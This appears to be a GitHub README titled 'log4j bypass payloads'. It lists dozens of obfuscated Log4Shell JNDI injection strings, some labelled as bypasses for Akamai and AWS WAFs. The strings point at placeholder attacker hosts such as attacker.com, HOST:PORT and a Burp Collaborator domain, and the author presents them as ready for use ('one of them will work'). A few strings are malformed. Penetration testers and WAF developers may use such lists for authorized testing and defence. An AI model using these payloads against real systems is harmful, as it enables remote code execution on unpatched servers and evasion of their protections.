└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # log4j bypass payloads 2 | 3 | Note these are copied from twitter, Can't mention authors or researchers individually. All I want to say Thank you very much. 4 | 5 | #### Akamai Bypass Log4j 6 | ${jndi${123%25ff:-}:ldap://HOST:PORT/a} 7 | 8 | #### Amazon AWS WAf Bypass 9 | 10 | ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://HOST:PORT/a} 11 | 12 | ${jnd${123%25ff:-${123%25ff:-i:}}ldap://HOST:PORT/a} 13 | 14 | 15 | ### Other bypass payloads 16 | 17 | 18 | ${lower:${:a:d:-${lower:}}jndi:} 19 | 20 | ${jndi:ldap://attacker.com/a} 21 | 22 | ${j${upper:${lower:n}}di:ldap://attacker.com/a} 23 | 24 | ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:ldap://attacker.com/a} 25 | 26 | ${${env:BARFOO:-j}Ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} 27 | 28 | ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/ass} 29 | 30 | ${${::-j}ndi:rmi://127.0.0.1:1389/ass} 31 | 32 | ${jndi:rmi://a.b.c} 33 | 34 | ${${lower:jndi}:${lower:rmi}://q.w.e/poc} 35 | 36 | ${${lower:${lower:jndi}}:${lower:rmi}://a.s.d/poc} 37 | 38 | ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://l} 39 | 40 | ${${::-j}ndi:rmi://} 41 | 42 | ${${lower:jndi}:${lower:rmi}://} 43 | 44 | ${${lower:${lower:jndi}}:${lower:rmi}:// 45 | 46 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}:} 47 | 48 | ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} 49 | 50 | ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} 51 | 52 | ${jndi:rmi://adsasd.asdasd.asdasd} 53 | 54 | ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc} 55 | 56 | ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc} 57 | 58 | ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc} 59 | 60 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc} 61 | 62 | ${j${upper:n:-}di:ldap://example.com:1389 63 | 64 | ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://kjhkjhkjh} 65 | 66 | ${j${main:\k5:-Nd}i${spring:k5:-:}ldap://kjhkjhkjh} 67 | 68 | ${j${sys:k5:-nD}${lower:i${web:k5:-:}}ldap://kjhkjhkjh} 69 | 70 | ${j${::-nD}i${::-:}ldap://kjhkjhkjh} 71 | 72 | ${j${EnV:K5:-nD}i:ldap://kjhkjhkjh} 73 | 74 | ${j${loWer:Nd}i${uPper::}ldap} 75 | 76 | ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:l}dap${env:NaN:-:}//your.burpcollaborator.net/a} 77 | 78 | ${${upper:}jndi:ldap://example.com/a} 79 | 80 | ${j${upper::-n}di:ldap://example.com:1389/a} 81 | 82 | ${"£$_"£:a:d:-${lower:j}n}di: 83 | 84 | ${:a:d:-${lower:}j}ndi: 85 | 86 | ${:a:d:-${lower:j}n}di: 87 | 88 | 89 | I am sure one of them will work. 90 | [My twitter](https://twitter.com/Chirag99Artani) 91 | Thank You! 92 | --------------------------------------------------------------------------------